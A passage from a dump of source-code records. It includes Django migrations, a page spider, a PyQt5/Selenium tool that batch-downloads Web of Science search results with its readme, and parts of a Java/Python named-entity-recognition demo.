"text": "# Generated by Django 2.0.6 on 2018-09-17 11:02\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ShowImg',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('img', models.ImageField(upload_to='')),\n ('img_type', models.IntegerField(choices=[(0, '轮播'), (1, '最热'), (2, '最新')])),\n ('stat', models.IntegerField(choices=[(0, '下架'), (1, '上架')])),\n ],\n ),\n migrations.AlterField(\n model_name='userinfo',\n name='header_img',\n field=models.ImageField(blank=True, null=True, upload_to=''),\n ),\n ]\n"
},
{
"alpha_fraction": 0.459070086479187,
"alphanum_fraction": 0.4629993438720703,
"avg_line_length": 28.960784912109375,
"blob_id": "bd3689eb92da1c5e48c0db7e7a246dcf54841661",
"content_id": "953e4762cec50ac8d541cc7ac5293dbc1ce1c761",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 51,
"path": "/spider/cbgspider.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "import json\nimport re\nimport requests\nfrom lxml import etree\n\nclass Spider:\n def __init__(self, url):\n self.url = url\n self.base_data = None\n self.json_data = None\n self.xml = None\n\n self.session = requests.session()\n self.html = self.get_html()\n self.get_base()\n self.get_json()\n\n def get_html(self):\n result = self.session.get(self.url)\n result = self.session.get(self.url)\n result.encoding = 'gbk'\n return result.text\n\n def _get_html_by_xml(self):\n if self.xml is None:\n self.xml = etree.HTML(self.html)\n return self.xml\n\n def get_json(self):\n html = self._get_html_by_xml()\n data = html.xpath(\".//textarea[@id='equip_desc_value']/text()\")[0]\n data = data.replace('([',\n '{').replace('])', '}').replace('({',\n '[').replace('})', ']').replace(',}',\n '}').replace(',]',']')\n\n def fun(s):\n old = s.groups()[0]\n return '\"' + old + '' + '\":'\n\n result = re.sub(r'(\\d+):', fun, data[1:-1])\n\n self.json_data = json.loads(result)\n\n def get_base(self):\n base_data = re.findall('<script>.*?var\\s*?equip\\s*?=\\s*?({.*?});',\n self.html, re.DOTALL)[0].replace('\\n\\t',\n '').replace('\\n', '').replace(\n 'safe_json_decode(\\'null\\')', '0')\n\n self.base_data = json.loads(base_data)"
},
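
`Spider.get_json` above turns the page's Lua-style literal into JSON by rewriting brackets and then quoting the bare integer keys. A standalone sketch of that normalisation on a made-up input:

```python
import json
import re

# Made-up input in the page's Lua-like notation: ([ ]) wraps maps, ({ })
# wraps lists, and map keys are bare integers.
raw = "([1:({2,3}),4:([5:6])])"

# Same bracket rewrites as Spider.get_json.
data = (raw.replace('([', '{').replace('])', '}')
           .replace('({', '[').replace('})', ']')
           .replace(',}', '}').replace(',]', ']'))

# Quote the bare integer keys; the string then parses as ordinary JSON.
quoted = re.sub(r'(\d+):', lambda m: '"%s":' % m.group(1), data)
print(json.loads(quoted))  # {'1': [2, 3], '4': {'5': 6}}
```
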
{
"alpha_fraction": 0.6032540798187256,
"alphanum_fraction": 0.6282853484153748,
"avg_line_length": 29.730770111083984,
"blob_id": "dd20f6972d726688d1fe61f9bdd152da31892673",
"content_id": "8541f35ba0cc4137cbb0b926706b52331c9da759",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 799,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 26,
"path": "/dbmodels/migrations/0012_auto_20180918_1349.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 05:49\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0011_menu'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='transaction',\n name='user',\n field=models.ForeignKey(default=2, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='menu',\n name='parent_menu',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='child', to='dbmodels.Menu'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5451174378395081,
"alphanum_fraction": 0.5834363698959351,
"avg_line_length": 26.89655113220215,
"blob_id": "4a0103b7574a9fe943c3d8bc36760fcd2d306947",
"content_id": "8f958a5a89fc3eb2c8e99ed0f52a842405957210",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 833,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 29,
"path": "/dbmodels/migrations/0006_auto_20180917_1952.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:52\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0005_auto_20180917_1940'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='showimg',\n options={'verbose_name': '首页展示图片', 'verbose_name_plural': '首页展示图片'},\n ),\n migrations.AddField(\n model_name='showimg',\n name='create_time',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='showimg',\n name='top',\n field=models.BooleanField(default=False),\n ),\n ]\n"
}
] | 23 |
FlyHighest/WebOfScience-Downloader | https://github.com/FlyHighest/WebOfScience-Downloader | a21654545fab7da018277bb59013aac9fcdce0ae | b402c9a82f7f704622d3555114aec1eeb4f3e4b2 | 249595cb3da3ab191071b014cceafd7c1385fa85 | refs/heads/master | 2020-03-13T12:54:31.783433 | 2019-09-23T16:38:04 | 2019-09-23T16:38:04 | 131,128,564 | 7 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6909996867179871,
"alphanum_fraction": 0.7087364196777344,
"avg_line_length": 53.4471549987793,
"blob_id": "d5705b8264e52612c9d9e6f935c2e514187eb438",
"content_id": "ff56b3966618c9380a8de972b30004c32c254fe6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6892,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 123,
"path": "/ui_downloader.py",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\n# Form implementation generated from reading ui file 'webdownloader.ui'\r\n#\r\n# Created by: PyQt5 UI code generator 5.10.1\r\n#\r\n# WARNING! All changes made in this file will be lost!\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(515, 373)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.centralwidget)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setObjectName(\"label\")\r\n self.horizontalLayout_3.addWidget(self.label)\r\n self.urlEdit = QtWidgets.QLineEdit(self.centralwidget)\r\n self.urlEdit.setObjectName(\"urlEdit\")\r\n self.horizontalLayout_3.addWidget(self.urlEdit)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_3)\r\n self.horizontalLayout = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\r\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\r\n self.label_2.setObjectName(\"label_2\")\r\n self.horizontalLayout_6.addWidget(self.label_2)\r\n self.intervalBox = QtWidgets.QSpinBox(self.centralwidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.intervalBox.sizePolicy().hasHeightForWidth())\r\n self.intervalBox.setSizePolicy(sizePolicy)\r\n self.intervalBox.setMinimum(1)\r\n self.intervalBox.setMaximum(100)\r\n self.intervalBox.setProperty(\"value\", 3)\r\n self.intervalBox.setObjectName(\"intervalBox\")\r\n self.horizontalLayout_6.addWidget(self.intervalBox)\r\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\r\n self.label_3.setObjectName(\"label_3\")\r\n self.horizontalLayout_6.addWidget(self.label_3)\r\n self.horizontalLayout.addLayout(self.horizontalLayout_6)\r\n self.line = QtWidgets.QFrame(self.centralwidget)\r\n self.line.setFrameShape(QtWidgets.QFrame.VLine)\r\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.line.setObjectName(\"line\")\r\n self.horizontalLayout.addWidget(self.line)\r\n self.verticalLayout = QtWidgets.QVBoxLayout()\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.allButton = QtWidgets.QRadioButton(self.centralwidget)\r\n self.allButton.setChecked(True)\r\n self.allButton.setObjectName(\"allButton\")\r\n self.horizontalLayout_2.addWidget(self.allButton)\r\n self.singleButton = QtWidgets.QRadioButton(self.centralwidget)\r\n self.singleButton.setObjectName(\"singleButton\")\r\n self.horizontalLayout_2.addWidget(self.singleButton)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\r\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\r\n 
sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.label_4.sizePolicy().hasHeightForWidth())\r\n self.label_4.setSizePolicy(sizePolicy)\r\n self.label_4.setMaximumSize(QtCore.QSize(100, 16777215))\r\n self.label_4.setObjectName(\"label_4\")\r\n self.horizontalLayout_8.addWidget(self.label_4)\r\n self.startEdit = QtWidgets.QLineEdit(self.centralwidget)\r\n self.startEdit.setEnabled(False)\r\n self.startEdit.setMaximumSize(QtCore.QSize(100, 16777215))\r\n self.startEdit.setObjectName(\"startEdit\")\r\n self.horizontalLayout_8.addWidget(self.startEdit)\r\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\r\n self.horizontalLayout_8.addItem(spacerItem)\r\n self.label_5 = QtWidgets.QLabel(self.centralwidget)\r\n self.label_5.setObjectName(\"label_5\")\r\n self.horizontalLayout_8.addWidget(self.label_5)\r\n self.totalEdit = QtWidgets.QLineEdit(self.centralwidget)\r\n self.totalEdit.setEnabled(False)\r\n self.totalEdit.setMaximumSize(QtCore.QSize(100, 16777215))\r\n self.totalEdit.setObjectName(\"totalEdit\")\r\n self.horizontalLayout_8.addWidget(self.totalEdit)\r\n self.verticalLayout.addLayout(self.horizontalLayout_8)\r\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\r\n self.verticalLayout.addLayout(self.horizontalLayout_7)\r\n self.horizontalLayout.addLayout(self.verticalLayout)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout)\r\n self.startButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.startButton.setObjectName(\"startButton\")\r\n self.verticalLayout_2.addWidget(self.startButton)\r\n self.textBrowser = QtWidgets.QTextBrowser(self.centralwidget)\r\n self.textBrowser.setObjectName(\"textBrowser\")\r\n self.verticalLayout_2.addWidget(self.textBrowser)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"WebOfScience文件下载工具\"))\r\n self.label.setText(_translate(\"MainWindow\", \"下载地址\"))\r\n self.label_2.setText(_translate(\"MainWindow\", \"下载间隔\"))\r\n self.label_3.setText(_translate(\"MainWindow\", \"秒\"))\r\n self.allButton.setText(_translate(\"MainWindow\", \"全部下载\"))\r\n self.singleButton.setText(_translate(\"MainWindow\", \"单个文件\"))\r\n self.label_4.setText(_translate(\"MainWindow\", \"起始编号\"))\r\n self.label_5.setText(_translate(\"MainWindow\", \"下载数量\"))\r\n self.startButton.setText(_translate(\"MainWindow\", \"开始下载\"))\r\n\r\n"
},
{
"alpha_fraction": 0.7267441749572754,
"alphanum_fraction": 0.795265793800354,
"avg_line_length": 31.527027130126953,
"blob_id": "991aee21e8754265427c00a9f40b7335b7639e67",
"content_id": "baae312e524fd0afd7f000c4dac2bcec692646d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3458,
"license_type": "permissive",
"max_line_length": 195,
"num_lines": 74,
"path": "/readme.md",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "# WebOfScience-Downloader\n\nDownload files of search results from webofscience automatically. It is useful when you have thousands of papers to download\n\n# Packages\n\nThe following packages are used:\n\n PyQt5\n selenium\n \nIf you don't need a GUI, you may only need selenium to run downloader_func.py\n\nI use pyinstaller to generate two Exe files, you can use them on windows.\n\nI tested this program on win10/7(64bit) and win10(32bit)\n\nAlso, your computer should have Chrome installed and chrome web driver in system path.\n\nChrome version 66,chrome webdriver version2.3.7 are used during developing and testing.\n\n# Usage\n\n1. Install Chrome\n2. Install webdriver( notice the version should match with chrome version)\n3. Run the downloader\n\n\n\nFill 下载地址 with **a url that has search results displayed** like:\nhttp://apps.webofknowledge.com/Search.do?product=WOS&SID=\\*\\*\\*&search_mode=GeneralSearch&prID=\\*\\*\\*\n\n\n\n下载间隔: how many seconds the downloader waits after it starts to download a file. Try to increase this number if your network is not so good.\n\nPress “开始下载” to start download.\n\n# WebOfScience-下载器\n\n自动下载在webofscience上检索到的文章记录。\n\n# 运行环境\n使用到的包:\n\n PyQt5\n selenium\n \n如果你不需要界面的话,可以只使用downloader_func.py中的方法。\n\n我用pyinstaller打包好了两个exe,在64位win10/7和32位win10上测试过。\n\n下载器依赖于chrome浏览器和chromedriver。我在开发和测试时,使用的chrome版本是66,chromedriver版本是2.3.7。\n\n# 使用说明\n\n1. 安装Chrome。\n2. 安装对应版本的webdriver。\n3. 双击downloader.exe打开下载器。\n\n\n###### <center>下载器界面 </center>\n\n\n下载器的界面非常简单,下载地址填写**已经检索到论文结果**的网页地址。比如:\nhttp://apps.webofknowledge.com/Search.do?product=WOS&SID=\\*\\*\\*&search_mode=GeneralSearch&prID=\\*\\*\\*\n\n###### <center>需要的下载地址示例 </center>\n\n下载间隔,即文件下载后,隔几秒开始下一个文件下载,默认是3秒,可以根据网速调整,避免同时下载的文件太多,造成下载失败。\n\n右侧的选项“全部下载”,程序后自动获取检索结果网页中,记录总数,开始从1到最后,每500条记录一个文件进行下载。如果中间有网络错误,文件下载失败,或者其他特殊需求,可以选择“单个文件”,这时必须填写起始记录号和要下载的记录数量。下载数量不可以超过500。\n\n如果配置无误的话,点击“开始下载”之后会弹出一个chrome浏览器,程序开始自动进行操作。下载的文件保存在chrome的默认保存位置下,这个可以在浏览器的设置中配置。下载的文件会自动命名,一般为savedrecs (\\*).txt。在浏览器启动后,请**不要在网页中进行任何操作**,避免影响程序寻找需要点击的位置。另外,启动下载后,系统可能会提示是否允许下载器程序访问网络,点击允许即可。\n\n"
},
{
"alpha_fraction": 0.5942285060882568,
"alphanum_fraction": 0.6010993123054504,
"avg_line_length": 33.14482879638672,
"blob_id": "d596d169f4a6735f0b445610986bcac110021c16",
"content_id": "5a078951c64c4b6f1711bc9c8d625d652d64222c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5160,
"license_type": "permissive",
"max_line_length": 183,
"num_lines": 145,
"path": "/downloader.py",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\nfrom PyQt5 import QtWidgets, QtGui,QtCore\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport sys\r\nfrom ui_downloader import Ui_MainWindow # 导入生成form.py里生成的类\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\nclass DownloadThread(QtCore.QThread):\r\n trigger = QtCore.pyqtSignal(str)\r\n def __init__(self,url,interval=3,start=0,total=0,parent=None):\r\n super(DownloadThread, self).__init__(parent)\r\n self.url=url\r\n self.interval=interval\r\n self.start_n=start\r\n self.total=total\r\n \r\n def run(self):\r\n if int(self.start_n)==0:\r\n #all downloader\r\n self.startdownload(self.url,self.interval)\r\n else: \r\n #single downloader\r\n self.startdownload_single(self.url,int(self.start_n),int(self.total))\r\n \r\n def download_once(self,browser,start,end,first):\r\n\r\n #选中第5个下载选项\r\n try:\r\n elems = browser.find_element_by_id('exportMoreOptions') # Find the list button\r\n elems.click()\r\n except Exception as e:\r\n elems = browser.find_element_by_id('exportTypeName') # Find the list button\r\n elems.click()\r\n \r\n elem=browser.find_element_by_id('saveToMenu')\r\n elem=elem.find_element_by_css_selector('li:nth-child(3)')\r\n elem.click()\r\n \r\n\r\n elem=browser.find_element_by_id('numberOfRecordsRange')\r\n elem.click()\r\n\r\n markfrom=browser.find_element_by_id('markFrom')\r\n \r\n markfrom.clear()\r\n markfrom.send_keys(str(start))\r\n markto=browser.find_element_by_id('markTo')\r\n markto.clear()\r\n markto.send_keys(str(end))\r\n\r\n b=browser.find_element_by_id('select2-bib_fields-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(3)')\r\n ul.click()\r\n\r\n b=browser.find_element_by_id('select2-saveOptions-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(7)')\r\n ul.click()\r\n\r\n button=browser.find_element_by_id('exportButton')\r\n button.click()\r\n \r\n WebDriverWait(browser, 20, 0.5).until(EC.presence_of_element_located((By.CSS_SELECTOR,'form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')))\r\n \r\n close_a=browser.find_element_by_css_selector('form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')\r\n close_a.click()\r\n \r\n def startdownload(self,url,interval):\r\n browser = webdriver.Chrome()\r\n\r\n browser.get(url)\r\n\r\n totalEle=browser.find_element_by_id('trueFinalResultCount').get_attribute('innerHTML')\r\n first=True\r\n c=1\r\n for i in range(1,int(totalEle),500):\r\n if i+499<=int(totalEle):\r\n end=i+499\r\n \r\n else:\r\n end=int(totalEle)\r\n \r\n self.download_once(browser,i,end,first)\r\n first=False\r\n self.trigger.emit('正在下载第{:d}个文件: {:d} - {:d}'.format(c,i,end))\r\n\r\n c=c+1\r\n time.sleep(interval)\r\n\r\n\r\n def startdownload_single(self,url,start,total):\r\n browser = webdriver.Chrome()\r\n browser.get(url)\r\n\r\n self.download_once(browser,start,start+total-1,True)\r\n\r\n self.trigger.emit('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n \r\nclass Downloader(QtWidgets.QMainWindow,Ui_MainWindow): \r\n def __init__(self): \r\n super().__init__() \r\n self.setupUi(self)\r\n self.allButton.setChecked(True)\r\n self.allButton.clicked.connect(self.allbuttonclick)\r\n 
self.singleButton.clicked.connect(self.singlebuttonclick)\r\n self.startButton.clicked.connect(self.startdownload)\r\n \r\n def startdownload(self):\r\n if self.allButton.isChecked():\r\n url=self.urlEdit.text()\r\n interval=self.intervalBox.value()\r\n th=DownloadThread(url,interval,parent=self)\r\n th.trigger.connect(self.update_message)\r\n th.start()\r\n else:\r\n url=self.urlEdit.text()\r\n start=self.startEdit.text()\r\n total=self.totalEdit.text()\r\n th=DownloadThread(url,0,start,total,parent=self)\r\n th.trigger.connect(self.update_message)\r\n th.start()\r\n \r\n def allbuttonclick(self):\r\n self.startEdit.setEnabled(False)\r\n self.totalEdit.setEnabled(False)\r\n \r\n def singlebuttonclick(self):\r\n self.startEdit.setEnabled(True)\r\n self.totalEdit.setEnabled(True)\r\n \r\n def update_message(self,msg):\r\n self.textBrowser.append(msg)\r\n \r\napp = QApplication([])\r\nex = Downloader()\r\nex.show()\r\nsys.exit(app.exec_())"
},
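
`downloader.py` above keeps the Qt UI responsive by running Selenium inside a `QThread` and reporting progress through a `pyqtSignal`. A stripped-down sketch of just that pattern (widget wiring elided):

```python
from PyQt5 import QtCore

class Worker(QtCore.QThread):
    # Emitted from the worker thread; Qt delivers it on the GUI thread.
    trigger = QtCore.pyqtSignal(str)

    def run(self):
        for i in range(3):
            self.trigger.emit('downloading file %d' % (i + 1))

# Wiring inside the window class, as downloader.py does:
#   worker = Worker(parent=self)
#   worker.trigger.connect(self.textBrowser.append)
#   worker.start()
```
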
{
"alpha_fraction": 0.6469780206680298,
"alphanum_fraction": 0.6589972376823425,
"avg_line_length": 33.072288513183594,
"blob_id": "8ed49d18192bc0f8a02eedf5cbefb756872fbd18",
"content_id": "ac7692f14ed4cf43c5fe00bba685537c12bcd6dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2992,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 83,
"path": "/downloader_func.py",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\ndef download_once(browser,start,end,first):\r\n\r\n\r\n #选中第5个下载选项\r\n if(first==True):\r\n elems = browser.find_elements_by_css_selector('span.select2-selection__arrow') # Find the search box\r\n elems[1].click()\r\n elem=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(5)')\r\n elem.click()\r\n else:\r\n elem=browser.find_element_by_id('select2-saveToMenu-container')\r\n elem.click()\r\n\r\n\r\n elem=browser.find_element_by_id('numberOfRecordsRange')\r\n elem.click()\r\n\r\n markfrom=browser.find_element_by_id('markFrom')\r\n markfrom.send_keys(str(start))\r\n markto=browser.find_element_by_id('markTo')\r\n markto.send_keys(str(end))\r\n\r\n b=browser.find_element_by_id('select2-bib_fields-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(3)')\r\n ul.click()\r\n\r\n b=browser.find_element_by_id('select2-saveOptions-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(8)')\r\n ul.click()\r\n\r\n button=browser.find_element_by_css_selector('div.quickoutput-overlay-buttonset span.quickoutput-action button.primary-button')\r\n button.click()\r\n \r\n WebDriverWait(browser, 20, 0.5).until(EC.presence_of_element_located((By.CSS_SELECTOR,'form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')))\r\n \r\n close_a=browser.find_element_by_css_selector('form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')\r\n close_a.click()\r\n \r\ndef startdownload(downloader,url,interval):\r\n browser = webdriver.Chrome()\r\n\r\n browser.get(url)\r\n\r\n totalEle=browser.find_element_by_id('trueFinalResultCount').get_attribute('innerHTML')\r\n first=True\r\n c=1\r\n for i in range(1,int(totalEle),500):\r\n if i+499<=int(totalEle):\r\n end=i+499\r\n \r\n else:\r\n end=int(totalEle)\r\n \r\n download_once(browser,i,end,first)\r\n first=False\r\n print('正在下载第{:d}个文件: {:d} - {:d}'.format(c,i,end))\r\n downloader.update_message('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n\r\n c=c+1\r\n time.sleep(interval)\r\n\r\n browser.quit() \r\n\r\ndef startdownload_single(downloader,url,start,total):\r\n browser = webdriver.Chrome()\r\n browser.get(url)\r\n\r\n download_once(browser,start,start+total-1,True)\r\n\r\n print('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n downloader.update_message('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n browser.quit() "
}
] | 4 |
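
Both entry points in `downloader_func.py` lean on Web of Science's 500-records-per-export limit. The windowing arithmetic from `startdownload`, extracted as a tiny sketch:

```python
# Web of Science exports at most 500 records per file, so [1, total] is cut
# into 500-wide windows exactly as startdownload's for-loop does.
def batches(total, size=500):
    return [(i, min(i + size - 1, total)) for i in range(1, total + 1, size)]

print(batches(1234))  # [(1, 500), (501, 1000), (1001, 1234)]
```
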
314894831/nerdemo | https://github.com/314894831/nerdemo | 7e5b6850146810ae30ba67db58904285d1342f71 | 121d709fdc3f32f27f48361e264b7e3dc595a54d | 0a1bafc52d23e778644d3c7c1abe7bd9f9307470 | refs/heads/master | 2023-06-16T14:02:58.319438 | 2021-07-09T02:36:27 | 2021-07-09T02:36:27 | 384,298,503 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5638655424118042,
"alphanum_fraction": 0.5655462145805359,
"avg_line_length": 31.16216278076172,
"blob_id": "c97911b772cac22ad91c226fa08ddef912ad4460",
"content_id": "e27d219f383f6a62557c9b21401cfca4eb4ce3a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1190,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 37,
"path": "/src/main/java/com/ner/demo/utils/test.java",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "package com.ner.demo.utils;\n\nimport com.ner.demo.interfaces.Rel_bilstmcrf;\n\nimport java.io.*;\n\npublic class test {\n public static void main(String[] args) throws IOException {\n Rel_bilstmcrf R1=new Rel_bilstmcrf();\n R1.lstm_train(\"C:\\\\Users\\\\Bcopton\\\\Desktop\\\\sourse_data\",\"\");\n\n\n\n// String env=\"python\";\n// File dic=new File(\".\");\n// System.out.println(dic.getCanonicalFile());\n// String model=dic.getCanonicalFile()+\"/src/main/java/com/ner/demo/python/test.py\";\n// String cmd=env+\" \"+model;\n// System.out.println(cmd);\n// Runtime run=Runtime.getRuntime();\n// try{\n// Process process=run.exec(cmd);\n// InputStream in=process.getInputStream();\n// InputStreamReader reader=new InputStreamReader(in);\n// BufferedReader br =new BufferedReader(reader);\n// StringBuffer sb=new StringBuffer();\n// String message;\n// while((message=br.readLine())!=null){\n// sb.append(message);\n// }\n// System.out.println(sb);\n// }\n// catch (IOException e){\n// e.printStackTrace();\n// }\n }\n}\n"
},
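
`test.java` above shells out to a Python script and drains its stdout (see the commented-out `Runtime.exec` block). For comparison, a minimal sketch of the same round trip done from Python; the script path is illustrative:

```python
import subprocess

# Run a script and collect everything it prints, mirroring the Java side's
# Runtime.exec + BufferedReader loop. The path is illustrative.
proc = subprocess.run(
    ['python', 'src/main/java/com/ner/demo/python/test.py'],
    capture_output=True, text=True)
print(proc.stdout)
```
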
{
"alpha_fraction": 0.4934808313846588,
"alphanum_fraction": 0.5057289600372314,
"avg_line_length": 24.57575798034668,
"blob_id": "a133b19987d421ef5d8f8017126b8928fe1ca385",
"content_id": "5e5fd742486b6ab90b5f61f1908d265bec9b2be1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2633,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 99,
"path": "/src/main/java/com/ner/demo/python/transform_data.py",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "# 将原有文本转换为模型的输入文本\nimport os\nimport glob\nimport pandas as pd\nimport jieba\nimport sys\n\n\ntext_path=sys.argv[1]+\"\\*\"\ncsv_path='src/main/java/com/ner/demo/txts/ourtrain1.csv'#手工标注\n\ndef load_entity_label():\n label=set()\n entity=[]\n origin_result={}\n df=pd.read_csv(csv_path,sep=',', header=0,encoding=\"gbk\")\n for row in df.iterrows():\n label.add(row[1]['实体类型'])\n entity.append(row[1]['实体名称'])\n origin_result[row[1]['实体名称']]=row[1]['实体类型']\n return label, entity, origin_result\n\n\n#jieba分词,实体标注\ndef transform():\n origin_label, entity,origin_result=load_entity_label()\n\n #load dics\n for i in entity:\n jieba.add_word(i)\n \n # 分词\n s=[]\n paths=glob.glob(text_path)\n for p in paths:\n with open(p,'r', encoding='utf-8') as f:\n s.extend(jieba.lcut(f.read()))\n \n for ss in range(0, len(s)):\n if '\\n' in s[ss]:s[ss].replace('\\n','')\n\n\n # label transform\n with open('src/main/java/com/ner/demo/txts/chs_eng.txt','r', encoding='utf-8') as f2:\n var=f2.read()\n var=var.split('\\n')\n var_dic={}\n for v in var:\n vv=v.split('\\t')\n if len(vv)!=0:\n var_dic[vv[0]]=[vv[1], 